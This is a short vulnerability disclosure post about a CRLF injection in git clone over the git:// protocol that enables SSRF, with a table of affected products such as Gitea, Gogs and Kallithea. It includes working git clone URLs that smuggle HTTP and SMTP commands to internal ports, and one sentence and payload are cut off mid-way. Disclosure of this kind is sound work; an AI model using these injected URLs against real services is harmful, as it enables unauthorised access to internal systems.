Article List

git clone CRLF bug leading to SSRF in various products

Sun Nov 08 2020 18:10:00 GMT+0900 (일본 표준시)


When we connect to a server with git:// protocol, server, we send an initial request packet that looks something like:

002dgit-upload-pack repo.git\

When the repository contains a newline on it, the git clone command also includes the newline (CR, LF) to the packet.

002egit-upload-pack repo

It looks fine at first sight, but the main problem with this is that it is possible to send packets to other ports to communicate with other protocols, which can lead to possibility of SSRF attack on internal services.

For example, running commands like the following

$ git clone 'git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a'

will eventually send the following packet to localhost:1234.

0050git-upload-pack /
GET / HTTP/1.1


We can somewhat create some sophisticated pro With this way, it is possible to send some SMTP packets like the following code and send e-mails over SMTP protocol.

$ git clone 'git://localhost:25/,%2015%20Sep%202017%0aSubject%3A%20Hi%0d%0a.%0d%0aQUIT%0a'

Patch Status

  • git/git has been fixed appropriately.

  • Softwares that rely on git clone may be affected by this vulnerability.

Affected Products

Product NameCurrent StatusReference
KallitheaFixedRelease Notes v0.63
GogsFixedPlans to fix in upcoming release (v0.13)
GiteaFixedRelease v1.12.6
BitBucketMitigatedBounty awarded: P3

Unaffected Products

Product NameReason
GitHubGit protocol is not supported
GiteePort part is filtered, which leads to no impact
GitLabCRLF characters were filtered